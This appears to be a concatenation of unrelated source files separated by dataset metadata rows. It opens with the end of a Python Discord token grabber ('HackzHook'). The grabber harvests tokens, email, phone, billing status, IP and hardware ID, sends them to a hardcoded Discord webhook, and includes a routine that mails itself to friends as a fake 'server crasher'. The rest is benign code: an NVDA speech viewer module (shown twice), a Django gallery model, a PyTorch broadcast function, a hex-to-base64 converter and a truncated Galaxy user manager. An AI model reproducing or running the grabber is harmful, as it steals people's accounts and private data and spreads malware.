return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x0eec59,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": f"Token grabber by THC4L"
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "HackzHook",
"avatar_url": ""
}
try:
urlopen(Request("https://discord.com/api/webhooks/894240616073035836/eRCYt8KsbaNUyHsoG0lyljTw_oWwGsnrVfOT6mFINkTKKkni7rgsxOaanRg-Qeq_DJTE", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
print("downloaded HackzHook")
| true | true |
1c2cb33a1468285aeaaae12a0018473695336db0 | 6,746 | py | Python | source/speechViewer.py | riku22/nvdajp | 66a828ea89d317e4aa0ad2aed4b3b1e08920afb6 | [
"bzip2-1.0.6"
] | 19 | 2016-05-11T05:15:31.000Z | 2022-03-17T12:40:10.000Z | source/speechViewer.py | riku22/nvdajp | 66a828ea89d317e4aa0ad2aed4b3b1e08920afb6 | [
"bzip2-1.0.6"
] | 307 | 2015-08-27T11:22:33.000Z | 2022-03-29T10:43:34.000Z | source/speechViewer.py | riku22/nvdajp | 66a828ea89d317e4aa0ad2aed4b3b1e08920afb6 | [
"bzip2-1.0.6"
] | 14 | 2016-03-28T07:31:49.000Z | 2022-03-30T04:56:35.000Z | # A part of NonVisual Desktop Access (NVDA)
# Copyright (C) 2006-2021 NV Access Limited, Thomas Stivers, Accessolutions, Julien Cochuyt
# This file is covered by the GNU General Public License.
# See the file COPYING for more details.
import wx
import gui
import config
from logHandler import log
from speech import SpeechSequence
import gui.contextHelp
# Inherit from wx.Frame because these windows show in the alt+tab menu (where miniFrame does not)
# We have to manually add a wx.Panel to get correct tab ordering behaviour.
# wx.Dialog causes a crash on destruction when multiple were created at the same time (brailleViewer
# may start at the same time)
class SpeechViewerFrame(
gui.contextHelp.ContextHelpMixin,
wx.Frame # wxPython does not seem to call base class initializer, put last in MRO
):
helpId = "SpeechViewer"
def _getDialogSizeAndPosition(self):
dialogSize = wx.Size(500, 500)
dialogPos = wx.DefaultPosition
if not config.conf["speechViewer"]["autoPositionWindow"] and self.doDisplaysMatchConfig():
log.debug("Setting speechViewer window position")
speechViewSection = config.conf["speechViewer"]
dialogSize = wx.Size(speechViewSection["width"], speechViewSection["height"])
dialogPos = wx.Point(x=speechViewSection["x"], y=speechViewSection["y"])
return dialogSize, dialogPos
def __init__(self, onDestroyCallBack):
dialogSize, dialogPos = self._getDialogSizeAndPosition()
super().__init__(
gui.mainFrame,
title=_("NVDA Speech Viewer"),
size=dialogSize,
pos=dialogPos,
style=wx.CAPTION | wx.CLOSE_BOX | wx.RESIZE_BORDER | wx.STAY_ON_TOP
)
self._isDestroyed = False
self.onDestroyCallBack = onDestroyCallBack
self.Bind(wx.EVT_CLOSE, self.onClose)
self.Bind(wx.EVT_WINDOW_DESTROY, self.onDestroy)
self.Bind(wx.EVT_ACTIVATE, self._onDialogActivated, source=self)
self.frameContentsSizer = wx.BoxSizer(wx.HORIZONTAL)
self.SetSizer(self.frameContentsSizer)
self.panel = wx.Panel(self)
self.frameContentsSizer.Add(self.panel, proportion=1, flag=wx.EXPAND)
self.panelContentsSizer = wx.BoxSizer(wx.VERTICAL)
self.panel.SetSizer(self.panelContentsSizer)
self._createControls(sizer=self.panelContentsSizer, parent=self.panel)
self.SetTransparent(229) # int(255.0 * 0.90)
# Don't let speech viewer to steal keyboard focus when opened
self.ShowWithoutActivating()
def _createControls(self, sizer, parent):
self.textCtrl = wx.TextCtrl(
parent,
style=wx.TE_RICH2 | wx.TE_READONLY | wx.TE_MULTILINE
)
sizer.Add(
self.textCtrl,
proportion=1,
flag=wx.EXPAND
)
self.shouldShowOnStartupCheckBox = wx.CheckBox(
parent,
# Translators: The label for a setting in the speech viewer that controls
# whether the speech viewer is shown at startup or not.
label=_("&Show Speech Viewer on Startup")
)
sizer.Add(
self.shouldShowOnStartupCheckBox,
border=5,
flag=wx.EXPAND | wx.ALL
)
self.shouldShowOnStartupCheckBox.SetValue(config.conf["speechViewer"]["showSpeechViewerAtStartup"])
self.shouldShowOnStartupCheckBox.Bind(
wx.EVT_CHECKBOX,
self.onShouldShowOnStartupChanged
)
self.SetTransparent(229) # int(255.0 * 0.90)
def _onDialogActivated(self, evt):
# Check for destruction, if the speechviewer window has focus when we exit NVDA it regains focus briefly
# when the quit NVDA dialog disappears. Then shouldShowOnStartupCheckBox is a deleted window when we
# try to setFocus
if not self._isDestroyed:
# focus is normally set to the first child, however,
# the checkbox gives more context, and makes it obvious how to stop showing the dialog.
self.shouldShowOnStartupCheckBox.SetFocus()
def onClose(self, evt):
assert isActive, "Cannot close Speech Viewer as it is already inactive"
deactivate()
def onShouldShowOnStartupChanged(self, evt):
config.conf["speechViewer"]["showSpeechViewerAtStartup"] = self.shouldShowOnStartupCheckBox.IsChecked()
_isDestroyed: bool
def onDestroy(self, evt):
self._isDestroyed = True
log.debug("SpeechViewer destroyed")
self.onDestroyCallBack()
evt.Skip()
def doDisplaysMatchConfig(self):
configSizes = config.conf["speechViewer"]["displays"]
attachedSizes = self.getAttachedDisplaySizesAsStringArray()
return len(configSizes) == len(attachedSizes) and all( configSizes[i] == attachedSizes[i] for i in range(len(configSizes)))
def getAttachedDisplaySizesAsStringArray(self):
displays = ( wx.Display(i).GetGeometry().GetSize() for i in range(wx.Display.GetCount()) )
return [repr( (i.width, i.height) ) for i in displays]
def savePositionInformation(self):
position = self.GetPosition()
config.conf["speechViewer"]["x"] = position.x
config.conf["speechViewer"]["y"] = position.y
size = self.GetSize()
config.conf["speechViewer"]["width"] = size.width
config.conf["speechViewer"]["height"] = size.height
config.conf["speechViewer"]["displays"] = self.getAttachedDisplaySizesAsStringArray()
config.conf["speechViewer"]["autoPositionWindow"] = False
_guiFrame=None
isActive=False
def activate():
"""
Function to call to trigger the speech viewer window to open.
"""
_setActive(True, SpeechViewerFrame(_cleanup))
def _setActive(isNowActive, speechViewerFrame=None):
global _guiFrame, isActive
isActive = isNowActive
_guiFrame = speechViewerFrame
if gui and gui.mainFrame:
gui.mainFrame.onSpeechViewerEnabled(isNowActive)
#: How to separate items in a speech sequence
SPEECH_ITEM_SEPARATOR = " "
#: How to separate speech sequences
SPEECH_SEQUENCE_SEPARATOR = "\n"
def appendSpeechSequence(sequence: SpeechSequence) -> None:
""" Appends a speech sequence to the speech viewer.
@param sequence: To append, items are separated with . Concluding with a newline.
"""
if not isActive:
return
# If the speech viewer text control has the focus, we want to disable updates
# Otherwise it would be impossible to select text, or even just read it (as a blind person).
if _guiFrame.FindFocus() == _guiFrame.textCtrl:
return
# to make the speech easier to read, we must separate the items.
text = SPEECH_ITEM_SEPARATOR.join(
speech for speech in sequence if isinstance(speech, str)
)
_guiFrame.textCtrl.AppendText(text + SPEECH_SEQUENCE_SEPARATOR)
def _cleanup():
global isActive
if not isActive:
return
_setActive(False)
def deactivate():
global _guiFrame, isActive
if not isActive:
return
# #7077: If the window is destroyed, text control will be gone, so save speech viewer position before destroying the window.
_guiFrame.savePositionInformation()
_guiFrame.Destroy()
| 35.882979 | 126 | 0.739401 |
import wx
import gui
import config
from logHandler import log
from speech import SpeechSequence
import gui.contextHelp
class SpeechViewerFrame(
gui.contextHelp.ContextHelpMixin,
wx.Frame
):
helpId = "SpeechViewer"
def _getDialogSizeAndPosition(self):
dialogSize = wx.Size(500, 500)
dialogPos = wx.DefaultPosition
if not config.conf["speechViewer"]["autoPositionWindow"] and self.doDisplaysMatchConfig():
log.debug("Setting speechViewer window position")
speechViewSection = config.conf["speechViewer"]
dialogSize = wx.Size(speechViewSection["width"], speechViewSection["height"])
dialogPos = wx.Point(x=speechViewSection["x"], y=speechViewSection["y"])
return dialogSize, dialogPos
def __init__(self, onDestroyCallBack):
dialogSize, dialogPos = self._getDialogSizeAndPosition()
super().__init__(
gui.mainFrame,
title=_("NVDA Speech Viewer"),
size=dialogSize,
pos=dialogPos,
style=wx.CAPTION | wx.CLOSE_BOX | wx.RESIZE_BORDER | wx.STAY_ON_TOP
)
self._isDestroyed = False
self.onDestroyCallBack = onDestroyCallBack
self.Bind(wx.EVT_CLOSE, self.onClose)
self.Bind(wx.EVT_WINDOW_DESTROY, self.onDestroy)
self.Bind(wx.EVT_ACTIVATE, self._onDialogActivated, source=self)
self.frameContentsSizer = wx.BoxSizer(wx.HORIZONTAL)
self.SetSizer(self.frameContentsSizer)
self.panel = wx.Panel(self)
self.frameContentsSizer.Add(self.panel, proportion=1, flag=wx.EXPAND)
self.panelContentsSizer = wx.BoxSizer(wx.VERTICAL)
self.panel.SetSizer(self.panelContentsSizer)
self._createControls(sizer=self.panelContentsSizer, parent=self.panel)
self.SetTransparent(229)
self.ShowWithoutActivating()
def _createControls(self, sizer, parent):
self.textCtrl = wx.TextCtrl(
parent,
style=wx.TE_RICH2 | wx.TE_READONLY | wx.TE_MULTILINE
)
sizer.Add(
self.textCtrl,
proportion=1,
flag=wx.EXPAND
)
self.shouldShowOnStartupCheckBox = wx.CheckBox(
parent,
# Translators: The label for a setting in the speech viewer that controls
# whether the speech viewer is shown at startup or not.
label=_("&Show Speech Viewer on Startup")
)
sizer.Add(
self.shouldShowOnStartupCheckBox,
border=5,
flag=wx.EXPAND | wx.ALL
)
self.shouldShowOnStartupCheckBox.SetValue(config.conf["speechViewer"]["showSpeechViewerAtStartup"])
self.shouldShowOnStartupCheckBox.Bind(
wx.EVT_CHECKBOX,
self.onShouldShowOnStartupChanged
)
self.SetTransparent(229) # int(255.0 * 0.90)
def _onDialogActivated(self, evt):
# Check for destruction, if the speechviewer window has focus when we exit NVDA it regains focus briefly
# when the quit NVDA dialog disappears. Then shouldShowOnStartupCheckBox is a deleted window when we
# try to setFocus
if not self._isDestroyed:
# focus is normally set to the first child, however,
# the checkbox gives more context, and makes it obvious how to stop showing the dialog.
self.shouldShowOnStartupCheckBox.SetFocus()
def onClose(self, evt):
assert isActive, "Cannot close Speech Viewer as it is already inactive"
deactivate()
def onShouldShowOnStartupChanged(self, evt):
config.conf["speechViewer"]["showSpeechViewerAtStartup"] = self.shouldShowOnStartupCheckBox.IsChecked()
_isDestroyed: bool
def onDestroy(self, evt):
self._isDestroyed = True
log.debug("SpeechViewer destroyed")
self.onDestroyCallBack()
evt.Skip()
def doDisplaysMatchConfig(self):
configSizes = config.conf["speechViewer"]["displays"]
attachedSizes = self.getAttachedDisplaySizesAsStringArray()
return len(configSizes) == len(attachedSizes) and all( configSizes[i] == attachedSizes[i] for i in range(len(configSizes)))
def getAttachedDisplaySizesAsStringArray(self):
displays = ( wx.Display(i).GetGeometry().GetSize() for i in range(wx.Display.GetCount()) )
return [repr( (i.width, i.height) ) for i in displays]
def savePositionInformation(self):
position = self.GetPosition()
config.conf["speechViewer"]["x"] = position.x
config.conf["speechViewer"]["y"] = position.y
size = self.GetSize()
config.conf["speechViewer"]["width"] = size.width
config.conf["speechViewer"]["height"] = size.height
config.conf["speechViewer"]["displays"] = self.getAttachedDisplaySizesAsStringArray()
config.conf["speechViewer"]["autoPositionWindow"] = False
_guiFrame=None
isActive=False
def activate():
_setActive(True, SpeechViewerFrame(_cleanup))
def _setActive(isNowActive, speechViewerFrame=None):
global _guiFrame, isActive
isActive = isNowActive
_guiFrame = speechViewerFrame
if gui and gui.mainFrame:
gui.mainFrame.onSpeechViewerEnabled(isNowActive)
#: How to separate items in a speech sequence
SPEECH_ITEM_SEPARATOR = " "
#: How to separate speech sequences
SPEECH_SEQUENCE_SEPARATOR = "\n"
def appendSpeechSequence(sequence: SpeechSequence) -> None:
if not isActive:
return
# If the speech viewer text control has the focus, we want to disable updates
# Otherwise it would be impossible to select text, or even just read it (as a blind person).
if _guiFrame.FindFocus() == _guiFrame.textCtrl:
return
# to make the speech easier to read, we must separate the items.
text = SPEECH_ITEM_SEPARATOR.join(
speech for speech in sequence if isinstance(speech, str)
)
_guiFrame.textCtrl.AppendText(text + SPEECH_SEQUENCE_SEPARATOR)
def _cleanup():
global isActive
if not isActive:
return
_setActive(False)
def deactivate():
global _guiFrame, isActive
if not isActive:
return
# #7077: If the window is destroyed, text control will be gone, so save speech viewer position before destroying the window.
_guiFrame.savePositionInformation()
_guiFrame.Destroy()
| true | true |
1c2cb653021515a9f97f09004e4f0b9df55007c7 | 2,498 | py | Python | MyGallery/models.py | CharityMutonii/Gallery | d691f4bf77e97fc0a15ab88ecb9ebedb9fb378e7 | [
"MIT"
] | null | null | null | MyGallery/models.py | CharityMutonii/Gallery | d691f4bf77e97fc0a15ab88ecb9ebedb9fb378e7 | [
"MIT"
] | null | null | null | MyGallery/models.py | CharityMutonii/Gallery | d691f4bf77e97fc0a15ab88ecb9ebedb9fb378e7 | [
"MIT"
] | null | null | null | from django.db import models
# Create your models here.
class Category(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=50)
def __str__(self):
'''
method to display category
'''
return self.name
def save_category(self):
'''
method to save category
'''
return self.save()
def delete_category(self):
'''
method to delete category
'''
return self.delete()
def update_category(self, cat1):
'''
method to update category
'''
self.update(location_name = cat1)
class Location(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=60)
def __str__(self):
return self.name
def save_location(self):
return self.save()
def delete_location(self):
return self.delete()
def update_location(self, loc1):
self.update(location_name = loc1)
class Photo(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=244)
description = models.TextField()
location = models.ForeignKey('Location',on_delete=models.CASCADE)
category = models.ForeignKey('Category',on_delete=models.CASCADE)
post_date = models.DateTimeField(auto_now_add=True)
image = models.ImageField(upload_to="images/")
def __str__(self):
'''
method to display image
'''
return self.name
def save_image(self):
'''
method to save image
'''
return self.save()
def delete_image(self):
'''
method to delete image
'''
return self.delete()
@classmethod
def all_photos(cls):
"""
A method to return all photos
"""
return cls.objects.all()
@classmethod
def get_photo_by_id(cls, id):
"""
A method to get a photo based on its id
"""
return cls.objects.get(id = id)
@classmethod
def search_photo_by_category(cls, search):
"""
A method to return all photos based on catergory
"""
return cls.objects.filter(category__name__icontains = search)
@classmethod
def filter_by_location(cls, location):
"""
A method to filter all photos based on the location
"""
return cls.objects.filter(location__name__icontains = location) | 26.020833 | 75 | 0.599279 | from django.db import models
class Category(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=50)
def __str__(self):
return self.name
def save_category(self):
return self.save()
def delete_category(self):
return self.delete()
def update_category(self, cat1):
self.update(location_name = cat1)
class Location(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=60)
def __str__(self):
return self.name
def save_location(self):
return self.save()
def delete_location(self):
return self.delete()
def update_location(self, loc1):
self.update(location_name = loc1)
class Photo(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=244)
description = models.TextField()
location = models.ForeignKey('Location',on_delete=models.CASCADE)
category = models.ForeignKey('Category',on_delete=models.CASCADE)
post_date = models.DateTimeField(auto_now_add=True)
image = models.ImageField(upload_to="images/")
def __str__(self):
return self.name
def save_image(self):
return self.save()
def delete_image(self):
return self.delete()
@classmethod
def all_photos(cls):
return cls.objects.all()
@classmethod
def get_photo_by_id(cls, id):
return cls.objects.get(id = id)
@classmethod
def search_photo_by_category(cls, search):
return cls.objects.filter(category__name__icontains = search)
@classmethod
def filter_by_location(cls, location):
return cls.objects.filter(location__name__icontains = location) | true | true |
1c2cb6e17eb3f8b50d0763004077686a348c73c0 | 931 | py | Python | skpr/nn/_functions/Broadcast.py | PhilippPelz/scikit-pr-open | 50833b13160b6afe0a743d63d560bddeee2c18b5 | [
"MIT"
] | null | null | null | skpr/nn/_functions/Broadcast.py | PhilippPelz/scikit-pr-open | 50833b13160b6afe0a743d63d560bddeee2c18b5 | [
"MIT"
] | null | null | null | skpr/nn/_functions/Broadcast.py | PhilippPelz/scikit-pr-open | 50833b13160b6afe0a743d63d560bddeee2c18b5 | [
"MIT"
] | 1 | 2020-11-11T06:51:46.000Z | 2020-11-11T06:51:46.000Z | import torch as th
from torch.autograd import Function
import skpr.inout as io
class Broadcast(Function):
@staticmethod
def forward(ctx, input, ntimes, divide_by_ntimes=True):
io.logger.debug('Broadcast forward 1')
# out = input.clone()
# print 'Broadcast.forward'
ctx.ntimes = ntimes
ctx.divide_by_ntimes = divide_by_ntimes
io.logger.debug('Broadcast forward 2')
return input.view(1, *input.size()).expand(ntimes, *input.size())
@staticmethod
def backward(ctx, grad_output):
io.logger.debug('Broadcast backward 1')
# p.var['dCMul'] = grad_output.data.cpu().squeeze().numpy()
grad_input = th.sum(grad_output, 0)
if ctx.divide_by_ntimes:
grad_input.data.div_(ctx.ntimes)
# p.var['dP'] = grad_input.data.cpu().numpy()
io.logger.debug('Broadcast backward 2')
return grad_input, None, None
| 33.25 | 73 | 0.64232 | import torch as th
from torch.autograd import Function
import skpr.inout as io
class Broadcast(Function):
    """Autograd function that repeats a tensor ``ntimes`` along a new dim 0."""

    @staticmethod
    def forward(ctx, input, ntimes, divide_by_ntimes=True):
        io.logger.debug('Broadcast forward 1')
        # Stash the replication settings on the autograd context for backward().
        ctx.ntimes = ntimes
        ctx.divide_by_ntimes = divide_by_ntimes
        io.logger.debug('Broadcast forward 2')
        # Non-copying broadcast: view adds a leading singleton dim, expand repeats it.
        return input.view(1, *input.size()).expand(ntimes, *input.size())

    @staticmethod
    def backward(ctx, grad_output):
        io.logger.debug('Broadcast backward 1')
        # Summing over the replicated dim reverses the expand.
        grad_input = th.sum(grad_output, 0)
        if ctx.divide_by_ntimes:
            # Average instead of sum when requested at forward time.
            grad_input.data.div_(ctx.ntimes)
        io.logger.debug('Broadcast backward 2')
        # Only the first forward argument (input) receives a gradient.
        return grad_input, None, None
1c2cb7258d8fcc35b83be82c862143d79ad2662f | 616 | py | Python | set1/hexToBase64.py | nahgil2614/cryptopals | e1c83d07dacb1c159ab1bbc0532eca8200dedca0 | [
"MIT"
] | null | null | null | set1/hexToBase64.py | nahgil2614/cryptopals | e1c83d07dacb1c159ab1bbc0532eca8200dedca0 | [
"MIT"
] | null | null | null | set1/hexToBase64.py | nahgil2614/cryptopals | e1c83d07dacb1c159ab1bbc0532eca8200dedca0 | [
"MIT"
] | null | null | null | def hex_to_base64( hex ):
alph = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
bits = ''
for i in range(len(hex)):
mid = bin(int(hex[i], 16)).replace('0b', '')
while len(mid) != 4:
mid = '0' + mid
bits += mid
while (len(bits) % 6 != 0):
bits += '0'
base64 = ''
for j in range(0, len(bits), 6):
base64 += alph[ int( bits[j : j+6], 2) ]
return base64
def main():
    """Prompt for a hex string on stdin and print its base64 encoding."""
    string = input('Please enter hex string: ')
    print(hex_to_base64(string))
    return


# Run the interactive prompt only when executed as a script.
if __name__ == '__main__':
    main()
| 26.782609 | 78 | 0.525974 | def hex_to_base64( hex ):
alph = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
bits = ''
for i in range(len(hex)):
mid = bin(int(hex[i], 16)).replace('0b', '')
while len(mid) != 4:
mid = '0' + mid
bits += mid
while (len(bits) % 6 != 0):
bits += '0'
base64 = ''
for j in range(0, len(bits), 6):
base64 += alph[ int( bits[j : j+6], 2) ]
return base64
def main():
    """Read a hex string interactively and print the base64 conversion."""
    string = input('Please enter hex string: ')
    print(hex_to_base64(string))
    return


# Script entry point guard: do nothing on import.
if __name__ == '__main__':
    main()
1c2cb729a908d342f3ee9e0af387a71cf22e743f | 24,354 | py | Python | lib/galaxy/managers/users.py | ashvark/galaxy | 71d315cf3692b4a42fb684395a519d53f360ec92 | [
"CC-BY-3.0"
] | 1 | 2019-07-27T19:30:55.000Z | 2019-07-27T19:30:55.000Z | lib/galaxy/managers/users.py | ashvark/galaxy | 71d315cf3692b4a42fb684395a519d53f360ec92 | [
"CC-BY-3.0"
] | 2 | 2019-08-19T07:43:52.000Z | 2022-03-02T04:46:54.000Z | lib/galaxy/managers/users.py | ashvark/galaxy | 71d315cf3692b4a42fb684395a519d53f360ec92 | [
"CC-BY-3.0"
] | 1 | 2019-03-21T16:35:07.000Z | 2019-03-21T16:35:07.000Z | """
Manager and Serializer for Users.
"""
import logging
import random
import socket
from datetime import datetime
from markupsafe import escape
from sqlalchemy import and_, desc, exc, func, true
from galaxy import (
exceptions,
model,
util
)
from galaxy.managers import (
api_keys,
base,
deletable
)
from galaxy.security.validate_user_input import validate_email, validate_password, validate_publicname
from galaxy.web import url_for
log = logging.getLogger(__name__)
PASSWORD_RESET_TEMPLATE = """
To reset your Galaxy password for the instance at %s use the following link,
which will expire %s.
%s%s
If you did not make this request, no action is necessary on your part, though
you may want to notify an administrator.
If you're having trouble using the link when clicking it from email client, you
can also copy and paste it into your browser.
"""
class UserManager(base.ModelManager, deletable.PurgableManagerMixin):
    """Business logic for Galaxy users: registration, lookup, admin checks,
    API keys, password management and notification emails."""

    foreign_key_name = 'user'

    # TODO: there is quite a bit of functionality around the user (authentication, permissions, quotas, groups/roles)
    # most of which it may be unneccessary to have here
    # TODO: incorp BaseAPIController.validate_in_users_and_groups
    # TODO: incorp CreatesApiKeysMixin
    # TODO: incorporate UsesFormDefinitionsMixin?

    def __init__(self, app):
        # The managed model class must be set before the base manager init runs.
        self.model_class = app.model.User
        super(UserManager, self).__init__(app)

    def register(self, trans, email=None, username=None, password=None, confirm=None, subscribe=False):
        """
        Register a new user.

        Returns a ``(user, message)`` tuple: on success ``(user, None)``,
        on failure ``(None, error_message)``.
        """
        if not trans.app.config.allow_user_creation and not trans.user_is_admin:
            message = "User registration is disabled. Please contact your local Galaxy administrator for an account."
            if trans.app.config.error_email_to is not None:
                message += " Contact: %s" % trans.app.config.error_email_to
            return None, message
        if not email or not username or not password or not confirm:
            return None, "Please provide email, username and password."
        # Collect all validation errors at once; empty strings vanish on rstrip.
        message = "\n".join([validate_email(trans, email),
                             validate_password(trans, password, confirm),
                             validate_publicname(trans, username)]).rstrip()
        if message:
            return None, message
        email = util.restore_text(email)
        username = util.restore_text(username)
        # NOTE(review): `status` is unused here.
        message, status = trans.app.auth_manager.check_registration_allowed(email, username, password)
        if message:
            return None, message
        if subscribe:
            message = self.send_subscription_email(email)
            if message:
                return None, message
        user = self.create(email=email, username=username, password=password)
        if self.app.config.user_activation_on:
            self.send_activation_email(trans, email, username)
        return user, None

    def create(self, email=None, username=None, password=None, **kwargs):
        """
        Create a new user and flush it to the database.

        Raises :class:`exceptions.Conflict` on a duplicate email or
        (via IntegrityError) a non-unique username.
        """
        self._error_on_duplicate_email(email)
        user = self.model_class(email=email)
        user.set_password_cleartext(password)
        user.username = username
        if self.app.config.user_activation_on:
            user.active = False
        else:
            # Activation is off, every new user is active by default.
            user.active = True
        self.session().add(user)
        try:
            self.session().flush()
            # TODO:?? flush needed for permissions below? If not, make optional
        except exc.IntegrityError as db_err:
            raise exceptions.Conflict(str(db_err))
        # can throw an sqlalx.IntegrityError if username not unique
        self.app.security_agent.create_private_user_role(user)
        # We set default user permissions, before we log in and set the default history permissions
        if hasattr(self.app.config, "new_user_dataset_access_role_default_private"):
            permissions = self.app.config.new_user_dataset_access_role_default_private
            self.app.security_agent.user_set_default_permissions(user, default_access_private=permissions)
        return user

    def delete(self, user):
        """Soft-delete: mark the user deleted and flush (no purge)."""
        user.deleted = True
        self.session().add(user)
        self.session().flush()

    def _error_on_duplicate_email(self, email):
        """
        Check for a duplicate email and raise if found.

        :raises exceptions.Conflict: if any are found
        """
        # TODO: remove this check when unique=True is added to the email column
        if self.by_email(email) is not None:
            raise exceptions.Conflict('Email must be unique', email=email)

    # ---- filters
    def by_email(self, email, filters=None, **kwargs):
        """
        Find a user by their email; returns None when no user matches.
        """
        filters = self._munge_filters(self.model_class.email == email, filters)
        try:
            # TODO: use one_or_none
            return super(UserManager, self).one(filters=filters, **kwargs)
        except exceptions.ObjectNotFound:
            return None

    def by_email_like(self, email_with_wildcards, filters=None, order_by=None, **kwargs):
        """
        Find users whose email matches a pattern containing SQL wildcards.
        """
        filters = self._munge_filters(self.model_class.email.like(email_with_wildcards), filters)
        order_by = order_by or (model.User.email, )
        return super(UserManager, self).list(filters=filters, order_by=order_by, **kwargs)

    # ---- admin
    def is_admin(self, user, trans=None):
        """Return True if this user is an admin (or session is authenticated as admin).

        Do not pass trans to simply check if an existing user object is an admin user,
        pass trans when checking permissions.
        """
        admin_emails = self._admin_emails()
        if user is None:
            # Anonymous session or master_api_key used, if master_api_key is detected
            # return True.
            rval = bool(trans and trans.user_is_admin)
            return rval
        return bool(admin_emails and user.email in admin_emails)

    def _admin_emails(self):
        """
        Return a list of admin email addresses from the config file.
        """
        return [email.strip() for email in self.app.config.get("admin_users", "").split(",")]

    def admins(self, filters=None, **kwargs):
        """
        Return a list of admin Users.
        """
        filters = self._munge_filters(self.model_class.email.in_(self._admin_emails()), filters)
        return super(UserManager, self).list(filters=filters, **kwargs)

    def error_unless_admin(self, user, msg="Administrators only", **kwargs):
        """
        Raise an error if `user` is not an admin; otherwise return the user.

        :raises exceptions.AdminRequiredException: if `user` is not an admin.
        """
        # useful in admin only methods
        if not self.is_admin(user, trans=kwargs.get("trans", None)):
            raise exceptions.AdminRequiredException(msg, **kwargs)
        return user

    # ---- anonymous
    def is_anonymous(self, user):
        """
        Return True if `user` is anonymous.
        """
        # define here for single point of change and make more readable
        return user is None

    def error_if_anonymous(self, user, msg="Log-in required", **kwargs):
        """
        Raise an error if `user` is anonymous; otherwise return the user.
        """
        if user is None:
            # TODO: code is correct (401) but should be named AuthenticationRequired (401 and 403 are flipped)
            raise exceptions.AuthenticationFailed(msg, **kwargs)
        return user

    # ---- current
    def current_user(self, trans):
        # define here for single point of change and make more readable
        # TODO: trans
        return trans.user

    # ---- api keys
    def create_api_key(self, user):
        """
        Create and return an API key for `user`.
        """
